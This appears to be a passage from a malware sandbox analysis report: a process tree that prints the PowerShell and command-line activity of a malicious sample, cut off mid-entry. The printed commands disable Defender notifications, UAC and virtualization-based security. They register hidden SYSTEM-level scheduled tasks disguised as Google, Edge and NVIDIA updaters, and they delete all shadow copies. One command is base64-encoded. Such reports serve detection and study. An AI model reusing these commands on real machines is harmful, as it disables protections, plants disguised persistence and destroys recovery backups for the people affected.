 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s "   - N a m e   " E x p l o r e r "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ E x p l o r e r "   - N a m e   " D i s a b l e N o t i f i c a t i o n C e n t e r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e E n h a n c e d N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r "   - N a m e   " N o t i f i c a t i o n s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s "   - N a m e   " D i s a b l e N o t i f i c a t i o n s "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - P r o p e r t y T y p e   D W o r d   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - P r o p e r t y T y p e   D W o r d   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " E n a b l e L U A "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n "   - N a m e   " A l l o w T e l e m e t r y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   " A l l o w C o r t a n a "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " E n a b l e V i r t u a l i z a t i o n B a s e d S e c u r i t y "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ D e v i c e G u a r d "   - N a m e   " R e q u i r e P l a t f o r m S e c u r i t y F e a t u r e s "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ S e s s i o n   M a n a g e r \ M e m o r y   M a n a g e m e n t "   - N a m e   " L a r g e P a g e M i n i m u m "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 6⤵
- Modifies Windows Defender notification settings
- UAC bypass
PID:4780 -
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:4192
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " B r a v e C r a s h H a n d l e r . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " M i c r o s o f t E d g e U p d a t e T a s k M a c h i n e C o r e { B 8 A C 1 6 6 8 - 9 7 D 2 - 4 2 D B - 9 4 D B - D 3 2 D E 5 0 5 8 8 A 1 } "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " G o o g l e C r a s h H a n d l e r . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " G o o g l e U p d a t e T a s k "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " G o o g l e U p d a t e T a s k S y s t e m _ 1 D 9 4 6 5 0 _ X M 7 T "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " E m b e d i t . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " N v T m R e p _ C r a s h R e p o r t _ D 2 E F 1 8 3 8 6 C 7 D C 4 6 C "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
 $ a c t i o n   =   N e w - S c h e d u l e d T a s k A c t i o n   - E x e c u t e   " S h e I l E x p e r i e n c e H o s t . e x e "   - W o r k i n g D i r e c t o r y   " $ e n v : L O C A L A P P D A T A \ S h e I l E x p e r i e n c e H o s t . e x e " ; 
 $ t r i g g e r D a i l y   =   N e w - S c h e d u l e d T a s k T r i g g e r   - D a i l y   - A t   " 0 0 : 0 0 " ; 
 $ t r i g g e r L o g o n   =   N e w - S c h e d u l e d T a s k T r i g g e r   - A t L o g O n ; 
 $ s e t t i n g s   =   N e w - S c h e d u l e d T a s k S e t t i n g s S e t   - A l l o w S t a r t I f O n B a t t e r i e s   - S t a r t W h e n A v a i l a b l e   - H i d d e n   - D o n t S t o p I f G o i n g O n B a t t e r i e s   - E x e c u t i o n T i m e L i m i t   0 ; 
 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " M i c r o s o f t E d g e U p d a t e T a s k M a c h i n e U A { 0 6 4 2 8 2 7 9 - 4 B 9 B - 4 3 C C - D 6 F 2 - B 2 F 9 8 0 A C 4 7 4 0 } "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 6⤵PID:5892
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:5968
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoATQBpAGMAcgBvAHMAbwBmAHQALQBXAGkAbgBkAG8AdwBzAC0AUwB1AGIAcwB5AHMAdABlAG0ALQBMAGkAbgB1AHgAIAAvAGEAbABsACAALwBuAG8AcgBlAHMAdABhAHIAdAAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoAVgBpAHIAdAB1AGEAbABNAGEAYwBoAGkAbgBlAFAAbABhAHQAZgBvAHIAbQAgAC8AYQBsAGwAIAAvAG4AbwByAGUAcwB0AGEAcgB0AAoAdwBzAGwAIAAtAC0AcwBlAHQALQBkAGUAZgBhAHUAbAB0AC0AdgBlAHIAcwBpAG8AbgAgADIACgAKACQAcABhAGcAZQBmAGkAbABlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBDAG8AbQBwAHUAdABlAHIAUwB5AHMAdABlAG0AIAAtAEUAbgBhAGIAbABlAEEAbABsAFAAcgBpAHYAaQBsAGUAZwBlAHMACgAkAHAAYQBnAGUAZgBpAGwAZQAuAEEAdQB0AG8AbQBhAHQAaQBjAE0AYQBuAGEAZwBlAGQAUABhAGcAZQBmAGkAbABlACAAPQAgACQAZgBhAGwAcwBlAAoAJABwAGEAZwBlAGYAaQBsAGUALgBwAHUAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAYQBnAGUARgBpAGwAZQBTAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADEANgAzADgANAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAaQBnAGgAUABlAHIAZgBvAHIAbQBhAG4AYwBlAFAAbwB3AGUAcgBQAGwAYQBuAEcAdQBpAGQAIAB7AAoAIAAgACAAIAAkAHAAbwB3AGUAcgBQAGwAYQBuAHMAIAA9ACAAcABvAHcAZQByAGMAZgBnACAALwBsAGkAcwB0ACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAFAAYQB0AHQAZQByAG4AIAAiAEcAVQBJAEQAIgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABfACAALQBtAGEAdABjAGgAIAAiAC4AKgBcACgAKAAuACoAPwApAFwAKQAuACoAIgApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwB1AGkAZAAgAD0AIAAkAG0AYQB0AGMAaABlAHMAWwAxAF0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAXwAgAC0AbQBhAHQAYwBoACAAIgAuACoAKABIAGkAZwBoACAAUABlAHIAZgBvAHIAbQBhAG4AYwBlAHwATQDDAKEAeABpAG0AbwAgAEQAZQBzAGUAbQBwAGUAbgBoAG8AfABEAGUAcwBlAG0AcABlAG4AaABvACAATQDDAKEAeABpAG0AbwB8AEEAbAB0AG8AIABEAGUAcwBlAG0AcABlAG4AaABvACkALgAqACIAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABnAHUAaQBkAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkACAAPQAgAEcAZQB0AC0ASABpAGcAaABQAGUAcgBmAG8AcgBtAGEAbgBjAGUAUABvAHcAZQByAFAAbABhAG4ARwB1AGkAZAAKAHAAbwB3AGUAcgBjAGYAZwAgAC8AcwAgACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkAAoACgAkAGcAcgBvAHUAcAAgAD0AIAAiACoAUwAtADEALQAxAC0AMAAiAAoAcwBlAGMAZQBkAGkAdAAgAC8AZQB4AHAAbwByAHQAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwApACAALQByAGUAcABsAGEAYwBlACAAJwBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAuACoAJwAsACAAIgBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAqACQAZwByAG8AdQBwACIAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAHMAZQBjAGUAZABpAHQAIAAvAGMAbwBuAGYAaQBnAHUAcgBlACAALwBkAGIAIABzAGUAYwBlAGQAaQB0AC4AcwBkAGIAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAgAC8AYQByAGUAYQBzACAAVQBTAEUAUgBfAFIASQBHAEgAVABTAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAAoAdgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AAoA6⤵PID:5904
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:6092
-
-
C:\Windows\system32\Dism.exe"C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart7⤵
- Drops file in Windows directory
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exeC:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exe {171615D6-3E5B-4B8C-A46C-239C8F9E531D}8⤵
- Drops file in Windows directory
- Executes dropped EXE
- Loads dropped DLL
PID:5872
-
-
-
C:\Windows\system32\Dism.exe"C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart7⤵
- Drops file in Windows directory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exeC:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exe {F98113A5-4387-4024-8C76-1D8826706807}8⤵
- Drops file in Windows directory
- Executes dropped EXE
- Loads dropped DLL
PID:3704
-
-
-
C:\Windows\system32\wsl.exe"C:\Windows\system32\wsl.exe" --set-default-version 27⤵PID:5832
-
-
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" /list7⤵
- Power Settings
PID:5584
-
-
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" /s7⤵
- Power Settings
PID:5708
-
-
C:\Windows\system32\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /export /cfg secconfig.cfg7⤵PID:4768
-
-
C:\Windows\system32\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db secedit.sdb /cfg secconfig.cfg /areas USER_RIGHTS7⤵PID:3564
-
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:6028
-
-
-
-
-
C:\Windows\SysWOW64\dxdiag.exe"C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1524
-
-
C:\Users\Admin\Embedit.exe"C:\Users\Admin\Embedit.exe"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
PID:1164 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3NX80XR.bat" "C:\Users\Admin\Embedit.exe" "5⤵PID:2884
-
C:\Windows\system32\chcp.comchcp 650016⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:6140
-
-
C:\Windows\system32\reg.exereg.exe add "HKCU\SOFTWARE\Microsoft\Installer" /f6⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4424
-
-
C:\Windows\system32\reg.exereg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products" /f6⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3976
-
-
C:\Windows\system32\reg.exereg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D" /f6⤵
